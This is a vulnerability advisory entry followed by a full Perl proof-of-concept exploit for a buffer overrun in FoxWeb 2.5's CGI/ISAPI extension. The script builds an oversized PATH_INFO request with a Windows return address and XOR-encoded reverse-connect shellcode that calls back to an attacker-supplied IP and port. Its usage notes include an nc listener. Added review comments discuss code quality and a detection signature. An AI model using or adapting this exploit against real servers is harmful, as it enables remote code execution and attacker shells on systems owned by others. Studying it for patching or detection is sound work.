source: https://www.securityfocus.com/bid/8547/info
FoxWeb is prone to a remotely exploitable buffer overrun vulnerability. This is due to insufficient bounds checking of user-supplied PATH_INFO data passed to the FoxWeb CGI and ISAPI extension. Successful exploitation would permit a remote attacker to execute arbitrary code in the context of the software.
#!/usr/bin/perl
#
# proof of concept foxweb 2.5 (http://www.foxweb.com)
# by pokleyzz <[email protected]>
#
# 06-27-2003
#
# usage:
# # nc -vv -l -p <local port>
# ...
# # ./bazooka_penaka.pl <target host> <target port> <local ip> <local port> [foxweb.dll path] [ret]
#
# kau persis musang berbulu ayam ..
#
# Greet:
# tynon, sk ,wanvadder, s0cket370, flyguy, sutan ,spoonfork, Schm|dt, kerengge_kurus and d'scan clan.
#
# ----------------------------------------------------------------------------
# "TEH TARIK-WARE LICENSE" (Revision 1):
# wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a "teh tarik" in return.
# ----------------------------------------------------------------------------
# (Base on Poul-Henning Kamp Beerware)
#
use IO::Socket;
# Defaults, overridable from the command line (positional arguments).
my $host   = "127.0.0.1";           # ARGV[0]
my $port   = 80;                    # ARGV[1]
my $musang = "/scripts/foxweb.dll"; # ARGV[4], request path of the DLL
my $rawret = "77e127bd"; # user32.dll = 0x77e127bd win2k sp3
# File-scoped slots filled in later by the helper subs and the connect code.
my ($conn, $ret, $xip, $xport);

# Four positional arguments are mandatory; otherwise print usage and stop.
if (@ARGV < 4) {
    print "[x] foxweb 2.5 exploit for windows \n\tby pokleyzz of d' scan clan <[email protected]>\n\n";
    print "Usage: \n bazooka_penaka.pl <target host> <target port> <local ip> <local port> [foxweb.dll path] [ret]\n";
    print "kau persis musang berbulu ayam ..\n";
    exit;
}
($host, $port, $myip, $myport) = @ARGV[0 .. 3];
# Optional overrides only replace the defaults when the argument is truthy
# (an empty string or "0" keeps the default).
$musang = $ARGV[4] if $ARGV[4];
$rawret = $ARGV[5] if $ARGV[5];
## start function
# Convert an 8-hex-digit address string into its four raw bytes in
# little-endian order, storing the result in the file-scoped $ret (which is
# also the value of the last expression evaluated).  Anything that is not
# exactly eight characters is echoed and the script dies.
sub string_to_ret {
    my $hex_addr = $_[0];
    if (length($hex_addr) != 8) {
        print $hex_addr;
        die "[*] incorrect return address ...\n ";
    }
    # Take the byte pairs from the end of the string backwards so the
    # first byte emitted is the least significant one.
    my @le_bytes = map { chr(hex(substr($hex_addr, $_, 2))) } (6, 4, 2, 0);
    $ret = join('', @le_bytes);
}
sub ip_to_shellcode {
# Encode a dotted-quad IPv4 string as four XOR-0x96 bytes in %xx form and
# store the result in the file-scoped $xip.  Only the octet count is checked;
# there is no check that each octet is within 0..255 (int() of a non-numeric
# field yields 0 with a warning).
my $sip = $_[0];
# NOTE(review): this relies on old perl behaviour where a void-context split
# populated @_; perls from 5.12 on no longer do this, so @ar_ip then holds
# just the sub's own argument and the count check below dies.
split /\./,"$sip" ;
@ar_ip = @_;
if ($#ar_ip < 3) {
die "[*] incorrect local ip ...\n ";
}
# Each octet XORed with 0x96 (matching the payload's decoder key) and
# formatted as a two-digit percent-escape.
$xip = sprintf("%%%.2x%%%.2x%%%.2x%%%.2x" ,int($ar_ip[0]) ^ 0x96 ,int($ar_ip[1]) ^ 0x96 ,int($ar_ip[2]) ^ 0x96 ,int($ar_ip[3]) ^ 0x96 );
}
# Encode a TCP port as two XOR-0x96 bytes (high byte first) in %xx form,
# storing the result in the file-scoped $xport, which is also the value of the
# last expression evaluated.  Dies when the number exceeds 65535; negative or
# non-numeric input is not rejected (int() of it is used as-is).
sub port_to_shellcode {
    my $port_num = int($_[0]);
    die "[*] incorrect port number ...\n " if $port_num > 65535;
    my $hi = ($port_num >> 0x08) ^ 0x96;
    my $lo = ($port_num & 0x0000000ff) ^ 0x96;
    $xport = sprintf("%%%.2x%%%.2x", $hi, $lo);
}
## end function
# reverse connect shellcode by sk <[email protected]>
# Percent-encoded payload, carried in the URL path.  The literal markers
# "PORT" and "IP" below are placeholders that are substituted further down
# with the XOR-0x96-encoded values produced by port_to_shellcode and
# ip_to_shellcode.  Note: $shellcode, $buffer, $request, $myip and $myport
# are never declared; the script has no 'use strict'.
$shellcode = ""
."%EB%02%EB%05%E8%F9%FF%FF%FF%58%83%C0%1B%8D%A0%01"
."%FC%FF%FF%83%E4%FC%8B%EC%33%C9%66%B9%5C%01%80%30"
."%96%40%E2%FA%7E%F6%96%96%96%D1%F3%E2%C6%E4%F9%F5"
."%D7%F2%F2%E4%F3%E5%E5%96%DA%F9%F7%F2%DA%FF%F4%E4"
."%F7%E4%EF%D7%96%D5%E4%F3%F7%E2%F3%C6%E4%F9%F5%F3"
."%E5%E5%D7%96%D3%EE%FF%E2%C6%E4%F9%F5%F3%E5%E5%96"
."%E1%E5%A4%C9%A5%A4%96%C1%C5%D7%C5%E2%F7%E4%E2%E3"
."%E6%96%C1%C5%D7%C5%F9%F5%FD%F3%E2%D7%96%F5%F9%F8"
."%F8%F3%F5%E2%96%F5%FB%F2%96%CC%C4%2D%96%96%66%E1"
."%17%AD%DB%CC%06%96%E2%95%DD%7D%63%1D%E5%AA%95%65"
."%1D%E0%EE%95%65%1D%E8%B6%95%6D%1D%D8%82%C0%A5%56"
."%C1%C7%1D%A9%95%6D%1D%64%A5%5F%27%98%65%30%CF%C9"
."%E2%90%15%51%92%D6%74%7E%C8%1D%C0%B2%95%45%47%76"
."%95%54%A5%5F%F0%1D%9E%1D%D0%8A%95%55%57%77%94%95"
."%57%1D%86%95%45%C8%1D%68%A5%5F%27%95%7E%EA%96%96"
."%96%15%50%9A%C4%C0%69%C1%62%CC%1D%4E%A5%5F%27%95"
."%7E%FE%96%96%96%15%50%9E%C3%FE%97%97%96%96%69%C1"
."%62%A5%56%C6%C6%C6%C6%D6%C6%D6%C6%69%C1%6E%1D%4E"
."%F0%51%D3%96%94%96%F0%51%D3%94"
."PORT" # 2 char placeholder, replaced below
."%51%D3%92"
."IP" # 4 char placeholder, replaced below
."%FC%86%C3%C5%69%C1%6A%A5%5F%27%87%C1%1D"
."%6B%65%3D%C9%50%D3%96%D2%1F%CB%AA%1F%CB%AE%1F%CB"
."%D6%F0%51%D3%BA%97%97%1B%D3%D2%C6%C3%C7%C7%C7%D7"
."%C7%DF%C7%C7%C0%C7%69%C1%7A%C6%69%C1%66%1C%90%D0"
."%12%56%E3%6F%C7%C4%C0%C5%69%44%CC%CF%3D%74%78%55";
# Worked examples of the encoding (not used by the code):
# port c6 96 = 0x5000 ^ 0x9696
# 96 c6
# ip BF 97 3E 56 = 192.168.1.41 ^ 0x96969696
# 56 3E 97 BF
# 127.0.0.1 = 7f000001
#$xip = "%56%3E%96%82"; # 192.168.0.20
# Fill the file-scoped $xip / $xport from the command-line values.
# NOTE(review): the &name(...) call form is legacy style; name(...) is preferred.
&ip_to_shellcode($myip);
&port_to_shellcode($myport);
#$xip = "%82%96%";
#$xport = "%07%06"; #9090
# Unanchored first-match substitutions: they assume "IP" and "PORT" occur
# exactly once in the encoded string above.
$shellcode =~ s/IP/$xip/;
$shellcode =~ s/PORT/$xport/;
# Little-endian return address into the file-scoped $ret (raw bytes, not
# percent-encoded, unlike the payload).
&string_to_ret($rawret);
# Path component layout: 1671 filler bytes, a 4-byte jump, the return
# address, 16 bytes of padding, then the encoded payload.
$buffer .= "A" x 1671;
$buffer .= "\xeb\x0c\xeb\x0c"; # jmp short 0x0c
$buffer .= $ret;
$buffer .= "B" x 16;
$buffer .= $shellcode;
# The buffer is appended to the DLL path, i.e. it arrives as PATH_INFO.
# Header lines are terminated with "\n" only.  For detection purposes, the
# visible signature is a request path of this size consisting mostly of a
# single repeated character followed by percent-escaped binary.
$request = ""
."GET $musang/$buffer HTTP/1.1\n"
."User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\n"
."Host: $host:$port\n"
."Connection: Close\n\n";
print "[x] Connect to $host on port $port ...\n";
# Plain TCP connection; a failed connect dies before anything is sent.
$conn = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => "$host",
PeerPort => "$port",
) or die "[*] Can't connect to $host on port $port ...\n";
$conn-> autoflush(1);
print "[x] Sending exploit code ...\n";
# The print's return value is not checked and the socket is never closed
# explicitly; no response is read.
print $conn $request;
print "[x] Exploit sent .. good luck :) ...\n";
#print $request;